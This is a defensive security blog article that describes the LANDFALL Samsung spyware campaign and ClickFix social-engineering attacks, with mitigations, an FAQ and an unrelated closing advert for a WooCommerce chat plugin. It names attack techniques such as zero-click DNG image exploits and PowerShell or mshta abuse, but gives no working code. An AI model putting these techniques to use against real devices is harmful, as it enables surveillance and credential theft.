Emerging Threats: LANDFALL and ClickFix Malware Campaigns
LANDFALL Android malware and ClickFix social-engineering malware campaigns have emerged as urgent threats to mobile and web security. These campaigns exploited image processing flaws and social tricks to bypass defenses.
Researchers tracked LANDFALL using malicious DNG image files that triggered code execution in Samsung devices. Because the exploit could enable zero-click remote code execution, risk to targets rose dramatically. ClickFix used convincing prompts and PowerShell or mshta techniques to lure users. As a result, organizations face both technical exploits and human-focused deception.
LANDFALL collected microphone audio, contacts, messages, and precise locations. Meanwhile ClickFix prioritized credential theft, browser manipulation, and cache smuggling for persistence. Both operations used evasion and living off the land binaries to avoid detection.
Therefore defenders cannot rely on a single security layer anymore. Instead teams must harden firmware, update apps, and train users on social engineering. This article explains the tactics, indicators, and mitigation steps in clear terms.
It also links related vulnerabilities such as CVE-2025-21042 and CVE-2025-21043 for context. Ultimately understanding these campaigns helps security teams close gaps and reduce exposure.
LANDFALL Android malware and ClickFix social engineering malware campaigns explained
LANDFALL is a precision Android spyware campaign that exploited Samsung image processing flaws. Researchers observed specially crafted DNG image files delivered over messaging apps like WhatsApp. Because the exploit targeted Samsung’s libimagecodec.quram.so library, it enabled remote code execution during image processing. Unit 42 tracked LANDFALL as CL UNK 1054 and documented zero click behaviors. For more technical details see Unit 42 Global Incident Response Report.
Attack methods
- Vector delivery using malicious DNG image files that looked normal in chats.
- Zero click exploitation of CVE-2025-21042 and later CVE-2025-21043 in Samsung firmware.
- Loader components such as a Bridge Head module that fetches
b.soand talks to a C2 server over HTTPS on ephemeral ports. - Evasion through debugger detection and anti analysis checks.
Targets and impact
- Primary targets included Samsung Galaxy S22 through S24, Z Fold4 and Z Flip4 devices.
- Capabilities included microphone recording, call interception, location tracking, and data exfiltration like photos and messages.
- Six samples appeared on VirusTotal between July 2024 and February 2025, and Samsung patched the flaws in April and September 2025.
- Consequently the campaign resembled known Middle East surveillance operations linked to Stealth Falcon and Variston markers. For coverage see The Hacker News and TechCrunch.
ClickFix is a separate social engineering focused campaign. It uses malvertising, SEO poisoning and browser prompts to trick users into running commands. Attackers leverage living off the land binaries like PowerShell and mshta for persistence. As a result defenders must combine firmware updates, browser hardening and user training to reduce risk.
LANDFALL Android malware and ClickFix social-engineering malware campaigns comparison
Below is a concise comparison of the two campaigns. It highlights vectors, targets, impact, detection difficulty and mitigations. Therefore security teams can quickly grasp differences and plan defenses.
| Attribute | LANDFALL Android spyware | ClickFix social engineering malware |
|---|---|---|
| Attack Vector | Malicious DNG image files delivered via messaging apps; exploits image processing library during rendering | Malvertising, SEO poisoning, deceptive browser prompts; lures users to run commands |
| Target Devices | Samsung Galaxy S22 S23 S24 series and Z Fold4 Z Flip4; devices with libimagecodec.quram.so | Broad desktop and mobile browsers; Windows endpoints that run PowerShell or mshta |
| Impact | Remote code execution, microphone recording, call interception, location tracking, data exfiltration | Credential theft, browser manipulation, cache smuggling, persistence via living off the land binaries |
| Detection Difficulty | High because of zero click exploit and anti analysis measures; stealthy C2 over HTTPS | Moderate to high because of social tricks and use of native binaries; activity can blend in |
| Mitigation Strategies | Patch firmware and apps immediately, use advanced threat prevention, block malicious image parsing, employ behavioral EDR | Harden browsers, block malvertising, train users, restrict execution of PowerShell and mshta, enable DNS and URL filtering |
Mitigation for LANDFALL Android malware and ClickFix social-engineering malware campaigns
Patch devices and apps as soon as updates become available. For example Samsung fixed CVE 2025 21042 and 21043, and WhatsApp and Apple released related patches. Because firmware fixes remove the underlying exploit, update at scale using mobile device management. Also disable automatic image downloads in messaging apps to reduce exposure to malicious DNG files. Use strong app permissions, and review microphone, camera, and location access regularly.
Use layered detection and prevention. Deploy behavioral endpoint detection and response, and enable network monitoring to flag unusual HTTPS connections to unknown hosts. In addition apply advanced URL and DNS filtering to block malvertising and SEO poisoning. For technical context and indicators see Unit 42 research at Unit 42 Global Incident Response Report and vulnerability details at CVE-2025-21042. Meanwhile TechCrunch provides a useful overview of the LANDFALL exploit at TechCrunch Overview.
Harden endpoints and servers. Restrict execution of PowerShell and mshta through application control, and use AppLocker or similar allow lists on Windows. Also remove unnecessary local administrator rights, and enforce multifactor authentication everywhere possible. Train staff with realistic phishing and social engineering simulations. As a result users will recognize deceptive prompts, and they will be less likely to run harmful commands.
Operational best practices
Maintain secure logging and retention so analysts can investigate post incident. Test incident response playbooks and tabletop exercises regularly. Finally subscribe to vendor advisories and threat feeds, because timely intelligence shortens remediation windows.
Conclusion
Awareness of LANDFALL Android malware and ClickFix social-engineering malware campaigns remains essential for defenders. These threats combine technical zero-click exploits and human trickery. Therefore organizations must patch promptly, enforce layered defenses, and train staff. As a result, teams reduce exposure and detection time.
Velocity Plugins offers AI driven WooCommerce plugins such as Velocity Chat that help commerce teams. In particular Velocity Chat improves conversion rates and reduces support costs by automating replies. For more information visit Velocity Plugins. Ultimately combining threat awareness with practical tooling strengthens both security and business resilience.
Moreover Velocity Chat integrates with WooCommerce workflows to route queries and collect customer signals. Therefore teams cut manual work and gain analytics to improve conversion and support efficiency. Finally stay vigilant and subscribe to vendor advisories for timely patches.
Frequently Asked Questions (FAQs)
Q1 What are LANDFALL and ClickFix and why do they matter?
LANDFALL Android malware and ClickFix social engineering malware campaigns combine technical exploits and human tricks. LANDFALL abused DNG image processing to run code without user action. ClickFix uses deceptive prompts and malvertising to convince users to run commands. Therefore both campaigns show attackers can bypass single controls.
Q2 How can I tell if a device is infected?
Look for unusual battery drain, microphone noise, or apps you did not install. Also watch for unexpected data transfers and unknown HTTPS connections. However these signs are subtle with advanced spyware, so use behavioral EDR and network logs for better detection.
Q3 I have a Samsung phone What immediate steps should I take?
First install vendor updates and security patches right away. For details on the relevant vulnerability see CVE-2025-21042. In addition disable automatic image downloads in messaging apps and review app permissions.
Q4 How can I reduce risk from ClickFix style attacks?
Train users to ignore unexpected prompts and unsolicited downloads. Block malvertising and apply DNS and URL filtering at the network edge. Also restrict PowerShell and mshta and use application allow lists.
Q5 What should organizations change in their security posture?
Adopt layered defenses including patch management, behavioral EDR, and advanced URL filtering. Use threat intelligence and run tabletop exercises to shorten response time. For research and indicators consult Unit 42. As a result teams will reduce exposure and improve detection.
